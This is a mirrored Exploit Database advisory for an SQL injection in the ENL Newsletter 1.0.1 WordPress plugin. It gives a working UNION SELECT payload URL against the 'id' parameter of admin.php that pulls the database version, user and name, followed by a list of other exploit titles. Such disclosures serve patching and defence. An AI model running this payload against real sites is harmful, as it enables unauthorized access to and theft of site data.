WordPress Plugin ENL NewsLetter – ‘/wp-admin/admin.php’ SQL Injection

Exploit Database
15 阅读

作者： Anant Shrivastava

日期： 2014-05-28
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/39253/

source: https://www.securityfocus.com/bid/68558/info

ENL Newsletter plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ENL Newsletter 1.0.1 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-admin/admin.php?page=enl-add-new&id=2 union select 1,@@version,3,user(),database(),6,7,8,9,0,1

last Exploits
WordPress Plugin ENL NewsLetter – ‘/wp-admin/admin.php’ SQL Injection的更多信息

PHPKB Multi-Language 9 – Authenticated Remote Code Execution：
Joomla! Component com_jejob – Local File Inclusion：
Ocomon 2.0 – SQL Injection：
osCommerce 2.3.1 – ‘banner_manager.php’ Arbitrary File Upload：
Elxis CMS 2009 – ‘administrator/index.php’ URI Cross-Site Scripting：
Numbas < v7.3 - Remote Code Execution：
Siemens SIMATIC S7-1200 CPU – Cross-Site Scripting：
WordPress Plugin myLDlinker – SQL Injection：